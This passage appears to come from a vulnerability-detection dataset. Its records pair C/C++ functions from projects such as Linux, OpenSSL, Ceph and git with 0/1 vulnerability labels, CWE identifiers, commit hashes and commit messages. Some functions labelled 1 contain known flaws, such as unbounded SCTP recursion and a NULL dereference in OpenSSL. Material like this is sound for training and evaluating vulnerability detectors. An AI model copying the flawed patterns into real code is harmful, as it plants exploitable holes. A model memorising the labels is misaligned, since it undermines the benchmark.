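    if (HMAC(EVP_sha256(), key, (int)key_len, metadata, md_len,
             mac, &mac_len) == NULL || mac_len != 32)
        return 0;
    return CRYPTO_memcmp(mac, expected, 32) == 0;   /* constant-time compare */
}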
void ms_handle_connect(Connection *con) override { };
| 0 |
[
"CWE-287",
"CWE-284"
] |
ceph
|
5ead97120e07054d80623dada90a5cc764c28468
| 132,577,681,684,009,430,000,000,000,000,000,000,000 | 1 |
auth/cephx: add authorizer challenge
Allow the accepting side of a connection to reject an initial authorizer
with a random challenge. The connecting side then has to respond with an
updated authorizer proving they are able to decrypt the service's challenge
and that the new authorizer was produced for this specific connection
instance.
The accepting side requires this challenge and response unconditionally
if the client side advertises they have the feature bit. Servers wishing
to require this improved level of authentication simply have to require
the appropriate feature.
Signed-off-by: Sage Weil <[email protected]>
(cherry picked from commit f80b848d3f830eb6dba50123e04385173fa4540b)
# Conflicts:
# src/auth/Auth.h
# src/auth/cephx/CephxProtocol.cc
# src/auth/cephx/CephxProtocol.h
# src/auth/none/AuthNoneProtocol.h
# src/msg/Dispatcher.h
# src/msg/async/AsyncConnection.cc
- const_iterator
- ::decode vs decode
- AsyncConnection ctor arg noise
- get_random_bytes(), not cct->random()
|
inline void base64Encode3to4(std::string_view data, std::string &output) {
uint32_t b32 = 0;
int i, j = 18;
for (i = 0; i < 3; ++i) {
b32 <<= 8;
b32 |= CharTo8Bit(data[i]);
}
for (i = 0; i < 4; ++i) {
output += base[(uint32_t)((b32 >> j) & 0x3F)];
j -= 6;
}
}
| 0 |
[
"CWE-94"
] |
js-compute-runtime
|
65524ffc962644e9fc39f4b368a326b6253912a9
| 202,903,216,359,076,700,000,000,000,000,000,000,000 | 14 |
use random_get instead of arc4random, as arc4random does not work correctly with wizer
wizer causes the seed in arc4random to be the same between executions, which is not random
|
utf32be_is_mbc_ambiguous(OnigCaseFoldType flag, const UChar** pp, const UChar* end)
{
const UChar* p = *pp;
(*pp) += 4;
if (*(p+2) == 0 && *(p+1) == 0 && *p == 0) {
int c, v;
p += 3;
if (*p == 0xdf && (flag & INTERNAL_ONIGENC_CASE_FOLD_MULTI_CHAR) != 0) {
return TRUE;
}
c = *p;
v = ONIGENC_IS_UNICODE_ISO_8859_1_BIT_CTYPE(c,
(BIT_CTYPE_UPPER | BIT_CTYPE_LOWER));
if ((v | BIT_CTYPE_LOWER) != 0) {
/* 0xaa, 0xb5, 0xba are lower case letter, but can't convert. */
if (c >= 0xaa && c <= 0xba)
return FALSE;
else
return TRUE;
}
return (v != 0 ? TRUE : FALSE);
}
return FALSE;
}
| 0 |
[
"CWE-125"
] |
php-src
|
b6fe458ef9ac1372b60c3d3810b0358e2e20840d
| 69,892,394,638,439,720,000,000,000,000,000,000,000 | 29 |
Fix bug #77418 - Heap overflow in utf32be_mbc_to_code
(cherry picked from commit aeec40cb50eca6a97975765e2bacc28a5950cfa9)
|
int __init sysenter_setup(void)
{
syscall_page = (void *)get_zeroed_page(GFP_ATOMIC);
#ifdef CONFIG_COMPAT_VDSO
__set_fixmap(FIX_VDSO, __pa(syscall_page), PAGE_READONLY);
printk("Compat vDSO mapped to %08lx.\n", __fix_to_virt(FIX_VDSO));
#endif
if (!boot_cpu_has(X86_FEATURE_SEP)) {
memcpy(syscall_page,
&vsyscall_int80_start,
&vsyscall_int80_end - &vsyscall_int80_start);
return 0;
}
memcpy(syscall_page,
&vsyscall_sysenter_start,
&vsyscall_sysenter_end - &vsyscall_sysenter_start);
return 0;
}
| 1 |
[
"CWE-264"
] |
linux-2.6
|
7d91d531900bfa1165d445390b3b13a8013f98f7
| 304,618,310,520,352,100,000,000,000,000,000,000,000 | 22 |
[PATCH] i386 vDSO: use install_special_mapping
This patch uses install_special_mapping for the i386 vDSO setup, consolidating
duplicated code.
Signed-off-by: Roland McGrath <[email protected]>
Cc: Ingo Molnar <[email protected]>
Cc: Paul Mackerras <[email protected]>
Cc: Benjamin Herrenschmidt <[email protected]>
Cc: Andi Kleen <[email protected]>
Signed-off-by: Andrew Morton <[email protected]>
Signed-off-by: Linus Torvalds <[email protected]>
|
string expectedResult() {
return string("\0AB", 3);
}
| 0 |
[
"CWE-835"
] |
mongo
|
0a076417d1d7fba3632b73349a1fd29a83e68816
| 159,988,978,067,753,160,000,000,000,000,000,000,000 | 3 |
SERVER-38070 fix infinite loop in agg expression
|
X509Certificate::X509CertificateTransferData::Deserialize(
Environment* env,
Local<Context> context,
std::unique_ptr<worker::TransferData> self) {
if (context != env->context()) {
THROW_ERR_MESSAGE_TARGET_CONTEXT_UNAVAILABLE(env);
return {};
}
Local<Value> handle;
if (!X509Certificate::New(env, data_).ToLocal(&handle))
return {};
return BaseObjectPtr<BaseObject>(
Unwrap<X509Certificate>(handle.As<Object>()));
}
| 0 |
[
"CWE-295"
] |
node
|
466e5415a2b7b3574ab5403acb87e89a94a980d1
| 173,481,428,283,399,080,000,000,000,000,000,000,000 | 16 |
crypto,tls: implement safe x509 GeneralName format
This change introduces JSON-compatible escaping rules for strings that
include X.509 GeneralName components (see RFC 5280). This non-standard
format avoids ambiguities and prevents injection attacks that could
previously lead to X.509 certificates being accepted even though they
were not valid for the target hostname.
These changes affect the format of subject alternative names and the
format of authority information access. The checkServerIdentity function
has been modified to safely handle the new format, eliminating the
possibility of injecting subject alternative names into the verification
logic.
Because each subject alternative name is only encoded as a JSON string
literal if necessary for security purposes, this change will only be
visible in rare cases.
This addresses CVE-2021-44532.
CVE-ID: CVE-2021-44532
PR-URL: https://github.com/nodejs-private/node-private/pull/300
Reviewed-By: Michael Dawson <[email protected]>
Reviewed-By: Rich Trott <[email protected]>
|
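A simplified C sketch of the escaping rule the message describes (Node's implementation is C++ and also escapes control characters): a SAN component is printed verbatim only when it cannot be confused with the surrounding list syntax; otherwise it is rendered as a JSON-style string literal, so a single name can never smuggle in an extra "DNS:" entry.
#include <stdio.h>
#include <string.h>
static void print_san_component(const char *prefix, const char *name)
{
    if (*name && !strpbrk(name, ",\"\\")) {   /* unambiguous: verbatim */
        printf("%s:%s", prefix, name);
        return;
    }
    printf("%s:\"", prefix);                   /* ambiguous: JSON literal */
    for (const char *p = name; *p; p++) {
        if (*p == '"' || *p == '\\')
            putchar('\\');
        putchar(*p);
    }
    putchar('"');
}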
static void tg3_read_otp_ver(struct tg3 *tp)
{
u32 val, val2;
if (tg3_asic_rev(tp) != ASIC_REV_5762)
return;
if (!tg3_ape_otp_read(tp, OTP_ADDRESS_MAGIC0, &val) &&
!tg3_ape_otp_read(tp, OTP_ADDRESS_MAGIC0 + 4, &val2) &&
TG3_OTP_MAGIC0_VALID(val)) {
u64 val64 = (u64) val << 32 | val2;
u32 ver = 0;
int i, vlen;
for (i = 0; i < 7; i++) {
if ((val64 & 0xff) == 0)
break;
ver = val64 & 0xff;
val64 >>= 8;
}
vlen = strlen(tp->fw_ver);
snprintf(&tp->fw_ver[vlen], TG3_VER_SIZE - vlen, " .%02d", ver);
}
}
| 0 |
[
"CWE-476",
"CWE-119"
] |
linux
|
715230a44310a8cf66fbfb5a46f9a62a9b2de424
| 255,737,391,273,932,970,000,000,000,000,000,000,000 | 24 |
tg3: fix length overflow in VPD firmware parsing
Commit 184b89044fb6e2a74611dafa69b1dce0d98612c6 ("tg3: Use VPD fw version
when present") introduced VPD parsing that contained a potential length
overflow.
Limit the hardware's reported firmware string length (max 255 bytes) to
stay inside the driver's firmware string length (32 bytes). On overflow,
truncate the formatted firmware string instead of potentially overwriting
portions of the tg3 struct.
http://cansecwest.com/slides/2013/PrivateCore%20CSW%202013.pdf
Signed-off-by: Kees Cook <[email protected]>
Reported-by: Oded Horovitz <[email protected]>
Reported-by: Brad Spengler <[email protected]>
Cc: [email protected]
Cc: Matt Carlson <[email protected]>
Signed-off-by: David S. Miller <[email protected]>
|
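The truncation pattern is visible in the fixed function above; here is a self-contained sketch of the same idea, with an invented FW_VER_SIZE standing in for TG3_VER_SIZE: snprintf is told how much room is really left, so a 255-byte device string lands truncated instead of overwriting adjacent struct fields.
#include <stdio.h>
#include <string.h>
#define FW_VER_SIZE 32
static void append_fw_string(char fw_ver[FW_VER_SIZE], const char *from_hw)
{
    size_t vlen = strlen(fw_ver);
    if (vlen >= FW_VER_SIZE)
        return;                                   /* buffer already full */
    snprintf(fw_ver + vlen, FW_VER_SIZE - vlen, " %s", from_hw);
}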
int ssh_buffer_reinit(struct ssh_buffer_struct *buffer)
{
if (buffer == NULL) {
return -1;
}
buffer_verify(buffer);
if (buffer->secure && buffer->allocated > 0) {
explicit_bzero(buffer->data, buffer->allocated);
}
buffer->used = 0;
buffer->pos = 0;
/* If the buffer is bigger then 64K, reset it to 64K */
if (buffer->allocated > 65536) {
int rc;
/* -1 for realloc_buffer magic */
rc = realloc_buffer(buffer, 65536 - 1);
if (rc != 0) {
return -1;
}
}
buffer_verify(buffer);
return 0;
}
| 0 |
[
"CWE-476"
] |
libssh-mirror
|
10b3ebbe61a7031a3dae97f05834442220447181
| 134,838,858,705,807,400,000,000,000,000,000,000,000 | 29 |
buffer: Reformat ssh_buffer_add_data()
Signed-off-by: Andreas Schneider <[email protected]>
Reviewed-by: Anderson Toshiyuki Sasaki <[email protected]>
Reviewed-by: Jakub Jelen <[email protected]>
|
static struct sctp_ulpevent *sctp_make_reassembled_event(struct sk_buff_head *queue, struct sk_buff *f_frag, struct sk_buff *l_frag)
{
struct sk_buff *pos;
struct sctp_ulpevent *event;
struct sk_buff *pnext, *last;
struct sk_buff *list = skb_shinfo(f_frag)->frag_list;
/* Store the pointer to the 2nd skb */
if (f_frag == l_frag)
pos = NULL;
else
pos = f_frag->next;
/* Get the last skb in the f_frag's frag_list if present. */
for (last = list; list; last = list, list = list->next);
/* Add the list of remaining fragments to the first fragments
* frag_list.
*/
if (last)
last->next = pos;
else
skb_shinfo(f_frag)->frag_list = pos;
/* Remove the first fragment from the reassembly queue. */
__skb_unlink(f_frag, queue);
while (pos) {
pnext = pos->next;
/* Update the len and data_len fields of the first fragment. */
f_frag->len += pos->len;
f_frag->data_len += pos->len;
/* Remove the fragment from the reassembly queue. */
__skb_unlink(pos, queue);
/* Break if we have reached the last fragment. */
if (pos == l_frag)
break;
pos->next = pnext;
pos = pnext;
};
event = sctp_skb2event(f_frag);
SCTP_INC_STATS(SCTP_MIB_REASMUSRMSGS);
return event;
}
| 1 |
[] |
linux-2.6
|
672e7cca17ed6036a1756ed34cf20dbd72d5e5f6
| 287,117,608,284,269,740,000,000,000,000,000,000,000 | 49 |
[SCTP]: Prevent possible infinite recursion with multiple bundled DATA.
There is a rare situation that causes lksctp to go into infinite recursion
and crash the system. The trigger is a packet that contains at least the
first two DATA fragments of a message bundled together. The recursion is
triggered when the user data buffer is smaller than the full data message.
The problem is that we clone the skb for every fragment in the message.
When reassembling the full message, we try to link skbs from the "first
fragment" clone using the frag_list. However, since the frag_list is shared
between two clones in this rare situation, we end up setting the frag_list
pointer of the second fragment to point to itself. This causes
sctp_skb_pull() to potentially recurse indefinitely.
Proposed solution is to make a copy of the skb when attempting to link
things using frag_list.
Signed-off-by: Vladislav Yasevich <[email protected]>
Signed-off-by: Sridhar Samudrala <[email protected]>
Signed-off-by: David S. Miller <[email protected]>
|
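A kernel-style sketch of the proposed solution's principle, with invented helper names rather than the actual lksctp change: take a private copy of a cloned buffer before threading it onto a frag_list, so two clones can never end up sharing (and self-referencing) the same list.
#include <linux/skbuff.h>
static struct sk_buff *link_fragment(struct sk_buff *first, struct sk_buff *frag)
{
    struct sk_buff *priv;
    priv = skb_cloned(frag) ? skb_copy(frag, GFP_ATOMIC) : frag;
    if (priv == NULL)
        return NULL;                               /* allocation failed */
    priv->next = skb_shinfo(first)->frag_list;     /* never points at itself */
    skb_shinfo(first)->frag_list = priv;
    return priv;
}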
alloc_clear_id(size_t size, alloc_id_T id UNUSED)
{
#ifdef FEAT_EVAL
if (alloc_fail_id == id && alloc_does_fail(size))
return NULL;
#endif
return alloc_clear(size);
}
| 0 |
[
"CWE-416"
] |
vim
|
9f1a39a5d1cd7989ada2d1cb32f97d84360e050f
| 102,476,859,141,161,700,000,000,000,000,000,000,000 | 8 |
patch 8.2.4040: keeping track of allocated lines is too complicated
Problem: Keeping track of allocated lines in user functions is too
complicated.
Solution: Instead of freeing individual lines keep them all until the end.
|
void mingw_startup(void)
{
int i, maxlen, argc;
char *buffer;
wchar_t **wenv, **wargv;
_startupinfo si;
/* get wide char arguments and environment */
si.newmode = 0;
if (__wgetmainargs(&argc, &wargv, &wenv, _CRT_glob, &si) < 0)
die_startup();
/* determine size of argv and environ conversion buffer */
maxlen = wcslen(_wpgmptr);
for (i = 1; i < argc; i++)
maxlen = max(maxlen, wcslen(wargv[i]));
for (i = 0; wenv[i]; i++)
maxlen = max(maxlen, wcslen(wenv[i]));
/*
* nedmalloc can't free CRT memory, allocate resizable environment
* list. Note that xmalloc / xmemdupz etc. call getenv, so we cannot
* use it while initializing the environment itself.
*/
environ_size = i + 1;
environ_alloc = alloc_nr(environ_size * sizeof(char*));
environ = malloc_startup(environ_alloc);
/* allocate buffer (wchar_t encodes to max 3 UTF-8 bytes) */
maxlen = 3 * maxlen + 1;
buffer = malloc_startup(maxlen);
/* convert command line arguments and environment to UTF-8 */
__argv[0] = wcstoutfdup_startup(buffer, _wpgmptr, maxlen);
for (i = 1; i < argc; i++)
__argv[i] = wcstoutfdup_startup(buffer, wargv[i], maxlen);
for (i = 0; wenv[i]; i++)
environ[i] = wcstoutfdup_startup(buffer, wenv[i], maxlen);
environ[i] = NULL;
free(buffer);
/* sort environment for O(log n) getenv / putenv */
qsort(environ, i, sizeof(char*), compareenv);
/* fix Windows specific environment settings */
setup_windows_environment();
/* initialize critical section for waitpid pinfo_t list */
InitializeCriticalSection(&pinfo_cs);
/* set up default file mode and file modes for stdin/out/err */
_fmode = _O_BINARY;
_setmode(_fileno(stdin), _O_BINARY);
_setmode(_fileno(stdout), _O_BINARY);
_setmode(_fileno(stderr), _O_BINARY);
/* initialize Unicode console */
winansi_init();
}
| 0 |
[
"CWE-20"
] |
git
|
6d8684161ee9c03bed5cb69ae76dfdddb85a0003
| 319,979,749,339,458,340,000,000,000,000,000,000,000 | 59 |
mingw: fix quoting of arguments
We need to be careful to follow proper quoting rules. For example, if an
argument contains spaces, we have to quote them. Double-quotes need to
be escaped. Backslashes need to be escaped, but only if they are
followed by a double-quote character.
We need to be _extra_ careful to consider the case where an argument
ends in a backslash _and_ needs to be quoted: in this case, we append a
double-quote character, i.e. the backslash now has to be escaped!
The current code, however, fails to recognize that, and therefore can
turn an argument that ends in a single backslash into a quoted argument
that now ends in an escaped double-quote character. This allows
subsequent command-line parameters to be split and part of them being
mistaken for command-line options, e.g. through a maliciously-crafted
submodule URL during a recursive clone.
Technically, we would not need to quote _all_ arguments which end in a
backslash _unless_ the argument needs to be quoted anyway. For example,
`test\` would not need to be quoted, while `test \` would need to be.
To keep the code simple, however, and therefore easier to reason about
and ensure its correctness, we now _always_ quote an argument that ends
in a backslash.
This addresses CVE-2019-1350.
Signed-off-by: Johannes Schindelin <[email protected]>
|
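A sketch of the quoting rules spelled out above, independent of git's mingw.c: backslash runs are doubled only when they precede a double quote, and the closing quote the function itself appends counts as one, which is why an argument ending in a single backslash gets that backslash doubled.
#include <stdio.h>
#include <string.h>
static void print_quoted_arg(const char *arg)
{
    if (*arg && !strpbrk(arg, " \t\"\\")) {      /* nothing to escape */
        fputs(arg, stdout);
        return;
    }
    putchar('"');
    for (const char *p = arg; *p; p++) {
        size_t nbs = 0;
        while (*p == '\\') {                     /* measure a backslash run */
            nbs++;
            p++;
        }
        if (*p == '\0') {                        /* run meets closing quote */
            for (size_t i = 0; i < 2 * nbs; i++)
                putchar('\\');
            break;
        }
        if (*p == '"') {                         /* run guards a quote */
            for (size_t i = 0; i <= 2 * nbs; i++)
                putchar('\\');
        } else {
            for (size_t i = 0; i < nbs; i++)
                putchar('\\');
        }
        putchar(*p);
    }
    putchar('"');
}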
Field *Field_bit::new_key_field(MEM_ROOT *root, TABLE *new_table,
uchar *new_ptr, uint32 length,
uchar *new_null_ptr, uint new_null_bit)
{
Field_bit *res;
if ((res= (Field_bit*) Field::new_key_field(root, new_table, new_ptr, length,
new_null_ptr, new_null_bit)))
{
/* Move bits normally stored in null_pointer to new_ptr */
res->bit_ptr= new_ptr;
res->bit_ofs= 0;
if (bit_len)
res->ptr++; // Store rest of data here
}
return res;
}
| 0 |
[
"CWE-416",
"CWE-703"
] |
server
|
08c7ab404f69d9c4ca6ca7a9cf7eec74c804f917
| 135,675,982,109,438,070,000,000,000,000,000,000,000 | 16 |
MDEV-24176 Server crashes after insert in the table with virtual
column generated using date_format() and if()
vcol_info->expr is allocated on expr_arena at parsing stage. Since
expr item is allocated on expr_arena all its containee items must be
allocated on expr_arena too. Otherwise fix_session_expr() will
encounter prematurely freed item.
When table is reopened from cache vcol_info contains stale
expression. We refresh expression via TABLE::vcol_fix_exprs() but
first we must prepare a proper context (Vcol_expr_context) which meets
some requirements:
1. As noted above expr update must be done on expr_arena as there may
be new items created. It was a bug in fix_session_expr_for_read() and
was just not reproduced because of no second refix. Now refix is done
for more cases so it does reproduce. Tests affected: vcol.binlog
2. Also name resolution context must be narrowed to the single table.
Tested by: vcol.update main.default vcol.vcol_syntax gcol.gcol_bugfixes
3. sql_mode must be clean and not fail expr update.
sql_mode such as MODE_NO_BACKSLASH_ESCAPES, MODE_NO_ZERO_IN_DATE, etc
must not affect vcol expression update. If the table was created
successfully any further evaluation must not fail. Tests affected:
main.func_like
Reviewed by: Sergei Golubchik <[email protected]>
|
static int iwl_fw_txf_len(struct iwl_fw_runtime *fwrt,
struct iwl_fwrt_shared_mem_cfg *mem_cfg)
{
size_t hdr_len = sizeof(struct iwl_fw_error_dump_data) +
sizeof(struct iwl_fw_error_dump_fifo);
u32 fifo_len = 0;
int i;
if (!iwl_fw_dbg_type_on(fwrt, IWL_FW_ERROR_DUMP_TXF))
goto dump_internal_txf;
/* Count TXF sizes */
if (WARN_ON(mem_cfg->num_lmacs > MAX_NUM_LMAC))
mem_cfg->num_lmacs = MAX_NUM_LMAC;
for (i = 0; i < mem_cfg->num_lmacs; i++) {
int j;
for (j = 0; j < mem_cfg->num_txfifo_entries; j++)
ADD_LEN(fifo_len, mem_cfg->lmac[i].txfifo_size[j],
hdr_len);
}
dump_internal_txf:
if (!(iwl_fw_dbg_type_on(fwrt, IWL_FW_ERROR_DUMP_INTERNAL_TXF) &&
fw_has_capa(&fwrt->fw->ucode_capa,
IWL_UCODE_TLV_CAPA_EXTEND_SHARED_MEM_CFG)))
goto out;
for (i = 0; i < ARRAY_SIZE(mem_cfg->internal_txfifo_size); i++)
ADD_LEN(fifo_len, mem_cfg->internal_txfifo_size[i], hdr_len);
out:
return fifo_len;
}
| 0 |
[
"CWE-400",
"CWE-401"
] |
linux
|
b4b814fec1a5a849383f7b3886b654a13abbda7d
| 35,513,939,849,712,790,000,000,000,000,000,000,000 | 35 |
iwlwifi: dbg_ini: fix memory leak in alloc_sgtable
In alloc_sgtable if alloc_page fails, the alocated table should be
released.
Signed-off-by: Navid Emamdoost <[email protected]>
Signed-off-by: Luca Coelho <[email protected]>
|
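A plain-C sketch of the leak class being fixed: when an allocation fails partway through a loop, the error path must unwind everything already allocated, including the containing table, before returning. Names are illustrative, not the sg-table code.
#include <stdlib.h>
static void **alloc_page_array(size_t n)
{
    void **pages = calloc(n, sizeof(*pages));
    if (pages == NULL)
        return NULL;
    for (size_t i = 0; i < n; i++) {
        pages[i] = malloc(4096);
        if (pages[i] == NULL) {
            while (i-- > 0)
                free(pages[i]);     /* unwind the partial allocation */
            free(pages);            /* and the table itself, per the fix */
            return NULL;
        }
    }
    return pages;
}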
int tls1_set_server_sigalgs(SSL *s)
{
int al;
size_t i;
/* Clear any shared signature algorithms */
if (s->cert->shared_sigalgs) {
OPENSSL_free(s->cert->shared_sigalgs);
s->cert->shared_sigalgs = NULL;
}
/* Clear certificate digests and validity flags */
for (i = 0; i < SSL_PKEY_NUM; i++) {
s->cert->pkeys[i].digest = NULL;
s->cert->pkeys[i].valid_flags = 0;
}
/* If sigalgs received process it. */
if (s->cert->peer_sigalgs) {
if (!tls1_process_sigalgs(s)) {
SSLerr(SSL_F_TLS1_SET_SERVER_SIGALGS, ERR_R_MALLOC_FAILURE);
al = SSL_AD_INTERNAL_ERROR;
goto err;
}
/* Fatal error if no shared signature algorithms */
if (!s->cert->shared_sigalgs) {
SSLerr(SSL_F_TLS1_SET_SERVER_SIGALGS,
SSL_R_NO_SHARED_SIGATURE_ALGORITHMS);
al = SSL_AD_ILLEGAL_PARAMETER;
goto err;
}
} else
ssl_cert_set_default_md(s->cert);
return 1;
err:
ssl3_send_alert(s, SSL3_AL_FATAL, al);
return 0;
}
| 1 |
[] |
openssl
|
76343947ada960b6269090638f5391068daee88d
| 852,727,070,496,221,600,000,000,000,000,000,000 | 36 |
Fix for CVE-2015-0291
If a client renegotiates using an invalid signature algorithms extension
it will crash a server with a NULL pointer dereference.
Thanks to David Ramos of Stanford University for reporting this bug.
CVE-2015-0291
Reviewed-by: Tim Hudson <[email protected]>
Conflicts:
ssl/t1_lib.c
|
static unsigned virq_from_irq(unsigned irq)
{
struct irq_info *info = info_for_irq(irq);
BUG_ON(info == NULL);
BUG_ON(info->type != IRQT_VIRQ);
return info->u.virq;
}
| 0 |
[
"CWE-400",
"CWE-703"
] |
linux
|
e99502f76271d6bc4e374fe368c50c67a1fd3070
| 192,854,227,310,103,300,000,000,000,000,000,000,000 | 9 |
xen/events: defer eoi in case of excessive number of events
In case rogue guests are sending events at high frequency it might
happen that xen_evtchn_do_upcall() won't stop processing events in
dom0. As this is done in irq handling a crash might be the result.
In order to avoid that, delay further inter-domain events after some
time in xen_evtchn_do_upcall() by forcing eoi processing into a
worker on the same cpu, thus inhibiting new events coming in.
The time after which eoi processing is to be delayed is configurable
via a new module parameter "event_loop_timeout" which specifies the
maximum event loop time in jiffies (default: 2, the value was chosen
after some tests showing that a value of 2 was the lowest with an
only slight drop of dom0 network throughput while multiple guests
performed an event storm).
How long eoi processing will be delayed can be specified via another
parameter "event_eoi_delay" (again in jiffies, default 10, again the
value was chosen after testing with different delay values).
This is part of XSA-332.
Cc: [email protected]
Reported-by: Julien Grall <[email protected]>
Signed-off-by: Juergen Gross <[email protected]>
Reviewed-by: Stefano Stabellini <[email protected]>
Reviewed-by: Wei Liu <[email protected]>
|
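A kernel-style sketch of the mechanism, with events_pending() and handle_one_event() as invented stand-ins for the evtchn internals: once the in-interrupt loop runs past its deadline, the remaining EOI processing is pushed to a worker on the same CPU, throttling a guest that floods events.
#include <linux/jiffies.h>
#include <linux/workqueue.h>
static void evtchn_loop(struct work_struct *deferred_eoi)
{
    unsigned long deadline = jiffies + 2;   /* event_loop_timeout default */
    while (events_pending()) {
        if (time_after(jiffies, deadline)) {
            schedule_work(deferred_eoi);    /* finish off the hard-irq path */
            return;
        }
        handle_one_event();
    }
}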
inline bool WireFormatLite::ReadRepeatedPrimitive(
int, // tag_size, unused.
uint32_t tag, io::CodedInputStream* input, RepeatedField<CType>* values) {
CType value;
if (!ReadPrimitive<CType, DeclaredType>(input, &value)) return false;
values->Add(value);
int elements_already_reserved = values->Capacity() - values->size();
while (elements_already_reserved > 0 && input->ExpectTag(tag)) {
if (!ReadPrimitive<CType, DeclaredType>(input, &value)) return false;
values->AddAlreadyReserved(value);
elements_already_reserved--;
}
return true;
}
| 0 |
[
"CWE-703"
] |
protobuf
|
d1635e1496f51e0d5653d856211e8821bc47adc4
| 16,486,268,237,104,419,000,000,000,000,000,000,000 | 14 |
Apply patch
|
uint32_t ProtocolV2::get_onwire_size(const uint32_t logical_size) const {
if (session_stream_handlers.rx) {
return segment_onwire_size(logical_size);
} else {
return logical_size;
}
}
| 0 |
[
"CWE-323"
] |
ceph
|
20b7bb685c5ea74c651ca1ea547ac66b0fee7035
| 136,684,594,334,222,820,000,000,000,000,000,000,000 | 7 |
msg/async/ProtocolV2: avoid AES-GCM nonce reuse vulnerabilities
The secure mode uses AES-128-GCM with 96-bit nonces consisting of a
32-bit counter followed by a 64-bit salt. The counter is incremented
after processing each frame, the salt is fixed for the duration of
the session. Both are initialized from the session key generated
during session negotiation, so the counter starts with essentially
a random value. It is allowed to wrap, and, after 2**32 frames, it
repeats, resulting in nonce reuse (the actual sequence numbers that
the messenger works with are 64-bit, so the session continues on).
Because of how GCM works, this completely breaks both confidentiality
and integrity aspects of the secure mode. A single nonce reuse reveals
the XOR of two plaintexts and almost completely reveals the subkey
used for producing authentication tags. After a few nonces get used
twice, all confidentiality and integrity goes out the window and the
attacker can potentially encrypt-authenticate plaintext of their
choice.
We can't easily change the nonce format to extend the counter to
64 bits (and possibly XOR it with a longer salt). Instead, just
remember the initial nonce and cut the session before it repeats,
forcing renegotiation.
Signed-off-by: Ilya Dryomov <[email protected]>
Reviewed-by: Radoslaw Zarzynski <[email protected]>
Reviewed-by: Sage Weil <[email protected]>
Conflicts:
src/msg/async/ProtocolV2.h [ context: commit ed3ec4c01d17
("msg: Build target 'common' without using namespace in
headers") not in octopus ]
|
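A C sketch of the mitigation's bookkeeping (the messenger itself is C++): remember the 32-bit counter portion of the session's first nonce and refuse to issue that value a second time, forcing renegotiation just before the 2**32nd frame would reuse a (counter, salt) pair.
#include <stdbool.h>
#include <stdint.h>
struct gcm_nonce_state {
    uint32_t initial_counter;   /* counter part of the first nonce used */
    uint32_t counter;           /* current value; the 64-bit salt is fixed */
    bool used;
};
static bool next_nonce_counter(struct gcm_nonce_state *st, uint32_t *out)
{
    if (st->used && st->counter == st->initial_counter)
        return false;           /* 2**32 frames sent: cut the session */
    *out = st->counter++;       /* may wrap; the check above catches reuse */
    st->used = true;
    return true;
}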
static int SetReqAttrib(byte* output, char* pw, int pwPrintableString,
int extSz)
{
const byte erOid[] =
{ ASN_OBJECT_ID, 0x09, 0x2a, 0x86, 0x48, 0x86, 0xf7, 0x0d, 0x01,
0x09, 0x0e };
int sz = 0; /* overall size */
int cpSz = 0; /* Challenge Password section size */
int cpSeqSz = 0;
int cpSetSz = 0;
int cpStrSz = 0;
int pwSz = 0;
int erSz = 0; /* Extension Request section size */
int erSeqSz = 0;
int erSetSz = 0;
byte cpSeq[MAX_SEQ_SZ];
byte cpSet[MAX_SET_SZ];
byte cpStr[MAX_PRSTR_SZ];
byte erSeq[MAX_SEQ_SZ];
byte erSet[MAX_SET_SZ];
output[0] = ASN_CONTEXT_SPECIFIC | ASN_CONSTRUCTED;
sz++;
if (pw && pw[0]) {
pwSz = (int)XSTRLEN(pw);
if (pwPrintableString) {
cpStrSz = SetPrintableString(pwSz, cpStr);
} else {
cpStrSz = SetUTF8String(pwSz, cpStr);
}
cpSetSz = SetSet(cpStrSz + pwSz, cpSet);
/* +2 for tag and length parts of the TLV triplet */
cpSeqSz = SetSequence(2 + sizeof(attrChallengePasswordOid) + cpSetSz +
cpStrSz + pwSz, cpSeq);
cpSz = cpSeqSz + 2 + sizeof(attrChallengePasswordOid) + cpSetSz +
cpStrSz + pwSz;
}
if (extSz) {
erSetSz = SetSet(extSz, erSet);
erSeqSz = SetSequence(erSetSz + sizeof(erOid) + extSz, erSeq);
erSz = extSz + erSetSz + erSeqSz + sizeof(erOid);
}
/* Put the pieces together. */
sz += SetLength(cpSz + erSz, &output[sz]);
if (cpSz) {
XMEMCPY(&output[sz], cpSeq, cpSeqSz);
sz += cpSeqSz;
sz += SetObjectId(sizeof(attrChallengePasswordOid), output + sz);
XMEMCPY(&output[sz], attrChallengePasswordOid,
sizeof(attrChallengePasswordOid));
sz += sizeof(attrChallengePasswordOid);
XMEMCPY(&output[sz], cpSet, cpSetSz);
sz += cpSetSz;
XMEMCPY(&output[sz], cpStr, cpStrSz);
sz += cpStrSz;
XMEMCPY(&output[sz], pw, pwSz);
sz += pwSz;
}
if (erSz) {
XMEMCPY(&output[sz], erSeq, erSeqSz);
sz += erSeqSz;
XMEMCPY(&output[sz], erOid, sizeof(erOid));
sz += sizeof(erOid);
XMEMCPY(&output[sz], erSet, erSetSz);
sz += erSetSz;
/* The actual extension data will be tacked onto the output later. */
}
return sz;
}
| 0 |
[
"CWE-125",
"CWE-345"
] |
wolfssl
|
f93083be72a3b3d956b52a7ec13f307a27b6e093
| 224,583,827,246,133,320,000,000,000,000,000,000,000 | 76 |
OCSP: improve handling of OCSP no check extension
|
isdn_net_force_hangup(char *name)
{
isdn_net_dev *p = isdn_net_findif(name);
struct net_device *q;
if (p) {
if (p->local->isdn_device < 0)
return 1;
q = p->local->slave;
/* If this interface has slaves, do a hangup for them also. */
while (q) {
isdn_net_hangup(q);
q = (((isdn_net_local *) q->priv)->slave);
}
isdn_net_hangup(p->dev);
return 0;
}
return -ENODEV;
}
| 0 |
[
"CWE-119"
] |
linux-2.6
|
0f13864e5b24d9cbe18d125d41bfa4b726a82e40
| 174,753,662,146,544,470,000,000,000,000,000,000,000 | 19 |
isdn: avoid copying overly-long strings
Addresses http://bugzilla.kernel.org/show_bug.cgi?id=9416
Signed-off-by: Karsten Keil <[email protected]>
Signed-off-by: Andrew Morton <[email protected]>
Signed-off-by: Linus Torvalds <[email protected]>
|
MagickPrivate double GetResizeFilterWindowSupport(
const ResizeFilter *resize_filter)
{
assert(resize_filter != (ResizeFilter *) NULL);
assert(resize_filter->signature == MagickCoreSignature);
return(resize_filter->window_support);
}
| 0 |
[
"CWE-125"
] |
ImageMagick
|
c5402b6e0fcf8b694ae2af6a6652ebb8ce0ccf46
| 164,404,039,657,329,080,000,000,000,000,000,000,000 | 7 |
https://github.com/ImageMagick/ImageMagick/issues/717
|
vmw_user_surface_base_to_res(struct ttm_base_object *base)
{
return &(container_of(base, struct vmw_user_surface,
prime.base)->srf.res);
}
| 0 |
[
